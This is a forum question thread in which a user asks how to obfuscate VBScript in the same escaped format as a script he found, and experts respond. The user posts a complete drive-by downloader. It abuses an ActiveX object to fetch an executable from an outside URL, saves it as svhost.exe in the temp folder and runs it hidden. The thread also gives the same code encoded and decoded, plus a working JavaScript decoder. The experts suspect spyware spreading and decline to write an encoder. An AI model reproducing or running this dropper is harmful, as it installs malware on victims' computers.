Javascript Unicode escaped characters (vbscript encode)

Im not java guru or anywhere near that so im having a little problem.

I've a script which decodes escaped characters
Script:
<script language="javascript">
function dF(s)
{
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
</script>

And thing to be decoded is written as
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(.....(6F2vfulsw(6H3

This thing is actually a VBscript encoded in that manner.
can anyone guide me how can i convert other vbscripts in above format? i.e: (6Fvfulsw(53odqjxdjh

i tried encoding by escape but i was not able to achieve my objective to convert it in (6Fvfulsw(53odqjxdjh manner.

http://scriptasylum.com/tutorials/encdec/encode-decode.html on this page 2nd decoder will help you decode.
Unknown-KillerAsked:
Who is Participating?
 
Michel PlungjanConnect With a Mentor IT ExpertCommented:
So you need to encode your vbscript to spread spyware too? I hope not!

Did you try
http://www.microsoft.com/downloads/details.aspx?FamilyId=E7877F67-C447-4873-B1B0-21F0626A6329&displaylang=en
0
 
Unknown-KillerAuthor Commented:
i would love if someone will post script in java or php to convert normal vbscript into that format and encoded stuff must be able to get decoded by this script

function dF(s)
{
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
df(mycode);
</script>
0
Free Tool: SSL Checker

Scans your site and returns information about your SSL implementation and certificate. Helpful for debugging and validating your SSL configuration.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

 
Unknown-KillerAuthor Commented:
can u be a little more brief and point me directly to the encoder?
0
 
Unknown-KillerAuthor Commented:
My Script:
<script language="VBScript">
    on error resume next
    dl = "http://-----/yo.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="svhost.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    </script>
After editing some stuff i want it to get converted in format like this
(6Fvfulsw(53odqjxdjh(6G(55YEVfulsw(55(6H(3G(3D(53(53(53(53rq(53huuru(53uhvxph(53qh{w(3G(3D(53(53(53(53go(53(6G(53(55kwws(6D22lwdoldqgluhfwru|1frp2whuph{2}lq1h{h(55(3G(3D(53(53(53(53Vhw(53gi(53(6G(53grfxphqw1fuhdwhHohphqw(5;(55remhfw(55(5<(3G(3D(53(53(53(53gi1vhwDwwulexwh(53(55fodvvlg(55(5F(53(55fovlg(6DEG<9F889098D6044G30<;6D033F37IF5<H69(55(3G(3D(53(53(53(53vwu(6G(55Plfurvriw1[POKWWS(55(3G(3D(53(53(53(53Vhw(53{(53(6G(53gi1FuhdwhRemhfw(5;vwu(5F(55(55(5<(3G(3D(53(53(53(53d4(6G(55Dgr(55(3G(3D(53(53(53(53d5(6G(55ge1(55(3G(3D(53(53(53(53d6(6G(55Vwu(55(3G(3D(53(53(53(53d7(6G(55hdp(55(3G(3D(53(53(53(53vwu4(6Gd4(59d5(59d6(59d7(3G(3D(53(53(53(53vwu8(6Gvwu4(3G(3D(53(53(53(53vhw(53V(53(6G(53gi1fuhdwhremhfw(5;vwu8(5F(55(55(5<(3G(3D(53(53(53(53V1w|sh(53(6G(534(3G(3D(53(53(53(53vwu9(6G(55JHW(55(3G(3D(53(53(53(53{1Rshq(53vwu9(5F(53go(5F(53Idovh(3G(3D(53(53(53(53{1Vhqg(3G(3D(53(53(53(53iqdph4(6G(55vykrvw1h{h(55(3G(3D(53(53(53(53vhw(53I(53(6G(53gi1fuhdwhremhfw(5;(55Vfulswlqj1IlohV|vwhpRemhfw(55(5F(55(55(5<(3G(3D(53(53(53(53vhw(53wps(53(6G(53I1JhwVshfldoIroghu(5;5(5<(3G(3D(53(53(53(53iqdph4(6G(53I1ExlogSdwk(5;wps(5Fiqdph4(5<(3G(3D(53(53(53(53V1rshq(3G(3D(53(53(53(53V1zulwh(53{1uhvsrqvhErg|(3G(3D(53(53(53(53V1vdyhwriloh(53iqdph4(5F5(3G(3D(53(53(53(53V1forvh(3G(3D(53(53(53(53vhw(53T(53(6G(53gi1fuhdwhremhfw(5;(55Vkhoo1Dssolfdwlrq(55(5F(55(55(5<(3G(3D(53(53(53(53T1VkhooH{hfxwh(53iqdph4(5F(55(55(5F(55(55(5F(55rshq(55(5F3(3G(3D(53(53(53(53(6F2vfulsw(6H3

I copied above code from some where else and it is not my encoded code
0
 
HonorGodSoftware EngineerCommented:
 Unfortunately, this question refers to Javascript, when, in fact, it is a VBscript question.  I wonder if a moderator could change this wording?
0
 
Michel PlungjanIT ExpertCommented:
The decoder is JS
0
 
Unknown-KillerAuthor Commented:
so any one?
0
 
Unknown-KillerAuthor Commented:
any pro dont know about it?
0
 
Michel PlungjanIT ExpertCommented:
0
 
Unknown-KillerAuthor Commented:
thats a decoder dude

maybe this can help
http://www.ibresource.ru/forums/index.php?showtopic=28683&pid=180784&mode=threaded&show=&st=&

if you dont understand russian then use http://babelfish.altavista.com 
they have some other script but encoded like i say
0
 
Michel PlungjanIT ExpertCommented:
0
 
Unknown-KillerAuthor Commented:
i was searching in google and came across this url
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.99show.com/adduser.asp&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3D(6Fvfulsw%26hl%3Den%26lr%3D%26sa%3DG

after looking at source i found out a code

(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3

i decoded it and got
<script language=JScript.Encode src=http://www.jq4u.com/myadv.asp></script>
but that page shows nothing maybe it needs paremeters
can it help?
0
 
Michel PlungjanIT ExpertCommented:
No, it is just a japanese page that no longer returns a script
0
 
Unknown-KillerAuthor Commented:
hah still no good method :-s i think this thing is buggy but some italian guys also coded stuff like that & have their spyware stuff being spread
0
 
Unknown-KillerAuthor Commented:
no, i want to expose exploit so microsoft can make their information bar more secure,
if u want mplungjan i can send u link to but anywhr in private to that spyware company
i work in a office and that spyware is spreading by yahoo infected lots of comps

i went to that link and it asks for genuine os stuff i dont know what it is talking about
0
 
Michel PlungjanIT ExpertCommented:
So why do you need an ENCODER to expose ?

Michel
0
 
Unknown-KillerAuthor Commented:
actually its a project, i'll get some good remarks on giving this thing to my company
0
 
Dennis MaederConnect With a Mentor Commented:
This scheme treats the two chars after ( as an offset pseudo-hexcode and other characters are offset ascii codes.
Here is a javascript to do the decoding for the example you provided.
It is possible that the offsets may vary - change eoff and roff.
It is also advisable to use the alert to view code ( or add spaces between characters ) in case the decrypted code is malicious.
D


<script type="text/javascript">

var cr = "(6Fvfulsw(53odqjxdjh(6GMVfulsw1Hqfrgh(53vuf (6Gkwws(6D22zzz1mt7x1frp2p|dgy1dvs (6H(6F2vfulsw(6H3";
alert (decode(cr));

function decode(cryptic){
  var dc   = "";
  var eoff = 51;
  var roff = 3;
  var ec   = "(";
  var cod  = "0123456789ABCDEFGHIJKLMN";
  var d    = "";
  var i    = 0;
  while(i < cryptic.length -1 ) {
    var c = cryptic.charAt(i);
    if (c == ec){
      /* deal with pseudo-hex code*/
      d = String.fromCharCode( 16*cod.indexOf(cryptic.charAt(i+1))+cod.indexOf(cryptic.charAt(i+2)) - eoff);
        i=i+3;      
      }
    else {
        d = String.fromCharCode(cryptic.charCodeAt(i)-roff);
        i++;      
      }
      dc=dc+d;
  }  
  return dc;      
}

</script>
 
0
 
Dennis MaederCommented:
The other code you quoted is most certainly malicious (to windows) and points to various exe
e.g.
<|s|c|r|i|p|t| |l|a|n|g|u|a|g|e|=|"|V|B|S|c|r|i|p|t|"|>| | | | | | |o|n| |e|r|r|o|r| |r|e|s|u|m|e| |n|e|x|t| | | | | | |d|l| |=| |"|h|t|t|p|:|/|/|i|t|a|l|i|a|n|d|i|r|e|c|t|o|r|y|.|c|o|m|/|t|e|r|m|e|x|/|z|i|n|.|e|x|e|"| | | | | | |S|e|t| |d|f| |=| |d|o|c|u|m|e|n|t|.|c|r|e|a|t|e|E|l|e|m|e|n|t||"|o|b|j|e|c|t|"|| | | | | | |d|f|.|s|e|t|A|t|t|r|i|b|u|t|e| |"|c|l|a|s|s|i|d|"|,| |"|c|l|s|i|d|:|B|D|9|6|C|5|5|6|-|6|5|A|3|-|1|1|D|0|-|9|8|3|A|-|0|0|C|0|4|F|C|2|9|E|3|6|"| | | | | | |s|t|r|=|"|M|i|c|r|o|s|o|f|t|.|X|M|L|H|T|T|P|"| | | | | | |S|e|t| |x| |=| |d|f|.|C|r|e|a|t|e|O|b|j|e|c|t||s|t|r|,|"|"|| | | | | | |a|1|=|"|A|d|o|"| | | | | | |a|2|=|"|d|b|.|"| | | | | | |a|3|=|"|S|t|r|"| | | | | | |a|4|=|"|e|a|m|"| | | | | | |s|t|r|1|=|a|1|&|a|2|&|a|3|&|a|4| | | | | | |s|t|r|5|=|s|t|r|1| | | | | | |s|e|t| |S| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||s|t|r|5|,|"|"|| | | | | | |S|.|t|y|p|e| |=| |1| | | | | | |s|t|r|6|=|"|G|E|T|"| | | | | | |x|.|O|p|e|n| |s|t|r|6|,| |d|l|,| |F|a|l|s|e| | | | | | |x|.|S|e|n|d| | | | | | |f|n|a|m|e|1|=|"|s|v|h|o|s|t|.|e|x|e|"| | | | | | |s|e|t| |F| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|c|r|i|p|t|i|n|g|.|F|i|l|e|S|y|s|t|e|m|O|b|j|e|c|t|"|,|"|"|| | | | | | |s|e|t| |t|m|p| |=| |F|.|G|e|t|S|p|e|c|i|a|l|F|o|l|d|e|r||2|| | | | | | |f|n|a|m|e|1|=| |F|.|B|u|i|l|d|P|a|t|h||t|m|p|,|f|n|a|m|e|1|| | | | | | |S|.|o|p|e|n| | | | | | |S|.|w|r|i|t|e| |x|.|r|e|s|p|o|n|s|e|B|o|d|y| | | | | | |S|.|s|a|v|e|t|o|f|i|l|e| |f|n|a|m|e|1|,|2| | | | | | |S|.|c|l|o|s|e| | | | | | |s|e|t| |Q| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e|c|t||"|S|h|e|l|l|.|A|p|p|l|i|c|a|t|i|o|n|"|,|"|"|| | | | | | |Q|.|S|h|e|l|l|E|x|e|c|u|t|e| |f|n|a|m|e|1|,|"|"|,|"|"|,|"|o|p|e|n|"|,|0| | | | | | |<|/|s|c|r|i|p|t|>|
0
 
Unknown-KillerAuthor Commented:
dennis_maeder can u tell me how to make encoder? i aint a java guru
0
 
Dennis MaederCommented:
Unknown-Killer, mplungjan,
Yes I think I can write a javascript encoder of this sort, but I'm not sure that I should.
Let me explain:
A decoder is defensive, it helps you know whats going on with a threat, but a published encoder may be used by some for illicit purposes.
This request is for a specific type of encoding known to be used for antisocial purposes, and I must assume that any code I might produce could be used in that way.
However, the scriptasylum link you gave at the top offers an encoder, and you or anyone could obfuscate their code using that.
Michel, as page editor, what do you think?
D
0
 
Michel PlungjanIT ExpertCommented:
I completely agree - hence my question in
#17849249
0
 
Dennis MaederCommented:
See my comments of 11/13. It took some effort to show questioner how the code worked, but I stopped short of providing an encoder for ethical reasons and to follow EE guidelines in concert with page editor and contributor Michel Plungjan. Should that be penalized?
D
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.